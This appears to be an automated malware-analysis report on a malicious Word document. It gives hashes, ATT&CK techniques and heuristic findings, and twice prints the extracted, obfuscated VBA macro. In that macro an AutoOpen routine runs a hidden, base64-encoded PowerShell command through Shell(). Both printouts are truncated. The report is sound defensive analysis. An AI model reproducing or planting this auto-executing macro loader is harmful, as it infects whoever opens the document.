Office (OLE) malware analysis — malicious · df233a730a2bfa36

MALICIOUS

Office (OLE)

102.5 KB Created: 2018-05-28 11:18:00 Authoring application: Microsoft Office Word First seen: 2019-05-10

MD5: 1df4e01e538c22d44f08dfa80c38aa15 SHA-1: 320202dd8f4ec5e0e43713e404836e400ab38e3c SHA-256: df233a730a2bfa36b73c2bc695a7bea8fe1be93d17d8f59addd6bcbcc1f683e9

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The Autoopen macro triggers the execution of a Shell() command, which is obfuscated but appears to construct a PowerShell command. This command is likely used to download and execute a second-stage payload, indicated by the critical OLE_VBA_SHELL heuristic firing. The reconstructed PowerShell command is included as an IOC.

Heuristics 6

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17479 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	17479 bytes
SHA-256: `a254c4306489517561106859762cb53d0fa79ff1e12169bb2bce72c4c645414f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "irIaIWB" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function kXMfY() On Error Resume Next XjnBlW = (GwIwX * owZjcq - wojVB * Round(2871)) + (32325 - Rnd(QPsjcK) + 33739 + HzLsJ) XlozIY = (DkVWm * jCRAk - NqjQP * Round(88973)) + (63439 - Rnd(oRjQz) + 24584 + RvhEs) kXMfY = pTwfdtmQKzb + cjfZcXT + YqiRi + CoblioFGQJr + iGqDqCnUv + LJmkL + WqftJsibhw + padmuHCXdtw + NkwLOoc + iRAvvddBlf UMfWMq = (iFpzb * vzrVYD - BjlDFZ * Round(49331)) + (85283 - Rnd(HkvrM) + 86808 + BtDDXo) End Function Sub Autoopen() On Error Resume Next bhpKRL = (ZIBQr * abRmQR - wFDka * Round(4990)) + (38154 - Rnd(bVzEMw) + 19141 + POIhs) wzscmDs (kXMfY) buaVFD = (cQmGY * WdFkOr - wnBMip * Round(32167)) + (10244 - Rnd(YIkXQ) + 59063 + JEwQQ) End Sub Function wzscmDs(zErGwwai) On Error Resume Next FMwnNn = (KiupIj * sOqQmU - riWBUr * Round(40361)) + (91364 - Rnd(RaTzip) + 27652 + bcMquO) OjrQvO = (iwXNhc * twXPwc - pjFDz * Round(99138)) + (79408 - Rnd(HkzQb) + 74716 + AEzQlw) KBZubzfY = Shell(BDijEliTd + Chr(vbKeyP) + wuCDXZvLjc + zErGwwai, vbHide) bVHmF = (jpbvlf * zlMvO - UpnPRA * Round(98320)) + (12628 - Rnd(SPhrSS) + 16019 + wNuHdR) End Function Attribute VB_Name = "BiwNqOsE" Function pTwfdtmQKzb() On Error Resume Next iOowLY = (ruHVRj * HCDPLE - UihrXJ * Round(97266)) + (76035 - Rnd(FCvmB) + 37704 + SvGzWz) KLiOozmYVT = "owersHeLL -WinD" + "owsTyle " + "hidden -" + "e IAAoACgAK" + "AAiAHsAMQAyAD" daXEmN = (jGViN * HEoPlE - BTWunn * Round(39412)) + (70722 - Rnd(EHcVE) + 6562 + zELZP) WbFpBW = "MAfQB7ADEAMgA4" + "AH0AewA2ADYAfQB" + "7ADEAMAA5A" + "H0AewAxA" + "DEANAB9" + "AHsANQA" + "wAH0AewA4ADY" + "AfQB7ADQAN" + "gB9AHs" + "ANQA0AH0" vaHom = (NHrLSX * KDdRzt - PCOCs * Round(54602)) + (7733 - Rnd(oKaiMj) + 45266 + mzBtXM) MOiMdlVw = "AewA3ADcAf" + "QB7ADY" + "ANAB9AHsANAAz" + "AH0Aew" vKzct = (WmMjv * tLFvK - ZSjln * Round(21528)) + (91739 - Rnd(HqSwzv) + 5801 + TsuzKa) MIYnjn = "AxADMAMQB9AHs" + "ANwA5AH0AewA4AD" + "EAfQB7A" + "DkAMwB9AHsANw" + "AyAH0AewAxADAAM" + "gB9AHsAMwA4" + "AH0AewAxAD" YNzQa = (khDqXz * jJWmhG - jUOhz * Round(5230)) + (7952 - Rnd(MBKLzA) + 16482 + puVIX) bMjAbuirlmp = "IANgB9AHsA" + "MQA0ADYAfQ" + "B7ADEANA" + "AyAH0AewA5ADkA" OHbwI = (JVISE * lDzQQ - ZsUCj * Round(22439)) + (96526 - Rnd(XmjrLz) + 65875 + GGFBt) wPkbVACYu = "fQB7AD" + "QAOAB9A" + "HsAMQAzAD" + "cAfQB7" + "ADgAfQB7ADI" + "AMAB9A" + "HsANQAx" + "AH0AewAyADk" + "AfQB7ADcAMw" + "B9AHsAMw" jrssHi = (FYYdz * ioMbQA - lXoQG * Round(13298)) + (74752 - Rnd(ztLPd) + 59612 + dJnEU) NDRJOVELAAh = "A2AH0AewA3ADgAf" + "QB7ADkAN" + "AB9AHsANgA1" + "AH0AewAxADIAfQB" SNHNNO = (jufoA * JLCclA - AIfNOT * Round(7801)) + (42113 - Rnd(CnLjl) + 37464 + hCssj) DdKmAHhaa = "7ADYANw" + "B9AHsAMQAxADAA" + "fQB7AD" + "gANQB9A" + "HsAMQAwA" + "H0AewA" + "4ADIAfQB" DNWOzV = (bjCEcd * iuzuK - YrsdUs * Round(79856)) + (4715 - Rnd(asHHU) + 9968 + qAUiY) iBsCRZ = "7ADgAMwB9" + "AHsAMgA1AH0Ae" + "wAxAD" + "MAMgB9" + "AHsAMgAzAH0Ae" + "wAxAH0AewAx" + "ADQANAB9A" pTwfdtmQKzb = KLiOozmYVT + WbFpBW + MOiMdlVw + MIYnjn + bMjAbuirlmp + wPkbVACYu + NDRJOVELAAh + DdKmAHhaa + iBsCRZ End Function Function cjfZcXT() On Error Resume Next VkHDHJ = (mDwhCH * VttGj - GGJwVJ * Round(9465)) + (33658 - Rnd(wZcIp) + 41044 + VRljb) hHqmzYNHGdR = "HsAMQAxADcAfQB7" + "ADYAMAB9" + "AHsAMQA1" + "AH0AewA3A" + "DEAfQB" + "7ADEAMAAwA" XtZFNt = (zGNBdc * aLiwE - jEZFt * Round(33736)) + (81443 - Rnd(YcVAS) + 46431 + QWPvLV) NCrCSwiINJD = "H0AewA" + "xADMAMAB9AHsANQ" + "AyAH0Aew" + "A0ADUAfQ" + "B7ADIAOAB9A" + "HsAMgA0" + "AH0AewAx" + "ADMAfQB7AD" + "MAMQB9" sMaiN = (jKinb * zSUUL - DhZisB * Round(21112)) + (8197 - Rnd(KpSDtn) + 55499 + MiOEk) PjMNtcqoV = "AHsANAAyAH0Aew" + "AxADAANgB9AHs" + "AOQAwAH0Aew" + "A5ADIAfQB7AD" + "gANAB9AHsAMQA0" + "ADUAfQB7ADEA" + "MAAxAH0AewAx" OtiYzY = (vBDzI * jOTZTI - VUQki * Round(61052)) + (43332 - Rnd(HpzrS) + ... (truncated)

SHA-256: a254c4306489517561106859762cb53d0fa79ff1e12169bb2bce72c4c645414f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "irIaIWB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function kXMfY()
On Error Resume Next
XjnBlW = (GwIwX * owZjcq - wojVB * Round(2871)) + (32325 - Rnd(QPsjcK) + 33739 + HzLsJ)
XlozIY = (DkVWm * jCRAk - NqjQP * Round(88973)) + (63439 - Rnd(oRjQz) + 24584 + RvhEs)
kXMfY = pTwfdtmQKzb + cjfZcXT + YqiRi + CoblioFGQJr + iGqDqCnUv + LJmkL + WqftJsibhw + padmuHCXdtw + NkwLOoc + iRAvvddBlf
UMfWMq = (iFpzb * vzrVYD - BjlDFZ * Round(49331)) + (85283 - Rnd(HkvrM) + 86808 + BtDDXo)
End Function
Sub Autoopen()
On Error Resume Next
bhpKRL = (ZIBQr * abRmQR - wFDka * Round(4990)) + (38154 - Rnd(bVzEMw) + 19141 + POIhs)
wzscmDs (kXMfY)
buaVFD = (cQmGY * WdFkOr - wnBMip * Round(32167)) + (10244 - Rnd(YIkXQ) + 59063 + JEwQQ)
End Sub
Function wzscmDs(zErGwwai)
On Error Resume Next
FMwnNn = (KiupIj * sOqQmU - riWBUr * Round(40361)) + (91364 - Rnd(RaTzip) + 27652 + bcMquO)
OjrQvO = (iwXNhc * twXPwc - pjFDz * Round(99138)) + (79408 - Rnd(HkzQb) + 74716 + AEzQlw)
KBZubzfY = Shell(BDijEliTd + Chr(vbKeyP) + wuCDXZvLjc + zErGwwai, vbHide)
bVHmF = (jpbvlf * zlMvO - UpnPRA * Round(98320)) + (12628 - Rnd(SPhrSS) + 16019 + wNuHdR)
End Function


Attribute VB_Name = "BiwNqOsE"
Function pTwfdtmQKzb()
On Error Resume Next
iOowLY = (ruHVRj * HCDPLE - UihrXJ * Round(97266)) + (76035 - Rnd(FCvmB) + 37704 + SvGzWz)
KLiOozmYVT = "owersHeLL -WinD" + "owsTyle " + "hidden -" + "e IAAoACgAK" + "AAiAHsAMQAyAD"
daXEmN = (jGViN * HEoPlE - BTWunn * Round(39412)) + (70722 - Rnd(EHcVE) + 6562 + zELZP)
WbFpBW = "MAfQB7ADEAMgA4" + "AH0AewA2ADYAfQB" + "7ADEAMAA5A" + "H0AewAxA" + "DEANAB9" + "AHsANQA" + "wAH0AewA4ADY" + "AfQB7ADQAN" + "gB9AHs" + "ANQA0AH0"
vaHom = (NHrLSX * KDdRzt - PCOCs * Round(54602)) + (7733 - Rnd(oKaiMj) + 45266 + mzBtXM)
MOiMdlVw = "AewA3ADcAf" + "QB7ADY" + "ANAB9AHsANAAz" + "AH0Aew"
vKzct = (WmMjv * tLFvK - ZSjln * Round(21528)) + (91739 - Rnd(HqSwzv) + 5801 + TsuzKa)
MIYnjn = "AxADMAMQB9AHs" + "ANwA5AH0AewA4AD" + "EAfQB7A" + "DkAMwB9AHsANw" + "AyAH0AewAxADAAM" + "gB9AHsAMwA4" + "AH0AewAxAD"
YNzQa = (khDqXz * jJWmhG - jUOhz * Round(5230)) + (7952 - Rnd(MBKLzA) + 16482 + puVIX)
bMjAbuirlmp = "IANgB9AHsA" + "MQA0ADYAfQ" + "B7ADEANA" + "AyAH0AewA5ADkA"
OHbwI = (JVISE * lDzQQ - ZsUCj * Round(22439)) + (96526 - Rnd(XmjrLz) + 65875 + GGFBt)
wPkbVACYu = "fQB7AD" + "QAOAB9A" + "HsAMQAzAD" + "cAfQB7" + "ADgAfQB7ADI" + "AMAB9A" + "HsANQAx" + "AH0AewAyADk" + "AfQB7ADcAMw" + "B9AHsAMw"
jrssHi = (FYYdz * ioMbQA - lXoQG * Round(13298)) + (74752 - Rnd(ztLPd) + 59612 + dJnEU)
NDRJOVELAAh = "A2AH0AewA3ADgAf" + "QB7ADkAN" + "AB9AHsANgA1" + "AH0AewAxADIAfQB"
SNHNNO = (jufoA * JLCclA - AIfNOT * Round(7801)) + (42113 - Rnd(CnLjl) + 37464 + hCssj)
DdKmAHhaa = "7ADYANw" + "B9AHsAMQAxADAA" + "fQB7AD" + "gANQB9A" + "HsAMQAwA" + "H0AewA" + "4ADIAfQB"
DNWOzV = (bjCEcd * iuzuK - YrsdUs * Round(79856)) + (4715 - Rnd(asHHU) + 9968 + qAUiY)
iBsCRZ = "7ADgAMwB9" + "AHsAMgA1AH0Ae" + "wAxAD" + "MAMgB9" + "AHsAMgAzAH0Ae" + "wAxAH0AewAx" + "ADQANAB9A"
pTwfdtmQKzb = KLiOozmYVT + WbFpBW + MOiMdlVw + MIYnjn + bMjAbuirlmp + wPkbVACYu + NDRJOVELAAh + DdKmAHhaa + iBsCRZ
End Function
Function cjfZcXT()
On Error Resume Next
VkHDHJ = (mDwhCH * VttGj - GGJwVJ * Round(9465)) + (33658 - Rnd(wZcIp) + 41044 + VRljb)
hHqmzYNHGdR = "HsAMQAxADcAfQB7" + "ADYAMAB9" + "AHsAMQA1" + "AH0AewA3A" + "DEAfQB" + "7ADEAMAAwA"
XtZFNt = (zGNBdc * aLiwE - jEZFt * Round(33736)) + (81443 - Rnd(YcVAS) + 46431 + QWPvLV)
NCrCSwiINJD = "H0AewA" + "xADMAMAB9AHsANQ" + "AyAH0Aew" + "A0ADUAfQ" + "B7ADIAOAB9A" + "HsAMgA0" + "AH0AewAx" + "ADMAfQB7AD" + "MAMQB9"
sMaiN = (jKinb * zSUUL - DhZisB * Round(21112)) + (8197 - Rnd(KpSDtn) + 55499 + MiOEk)
PjMNtcqoV = "AHsANAAyAH0Aew" + "AxADAANgB9AHs" + "AOQAwAH0Aew" + "A5ADIAfQB7AD" + "gANAB9AHsAMQA0" + "ADUAfQB7ADEA" + "MAAxAH0AewAx"
OtiYzY = (vBDzI * jOTZTI - VUQki * Round(61052)) + (43332 - Rnd(HpzrS) + 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.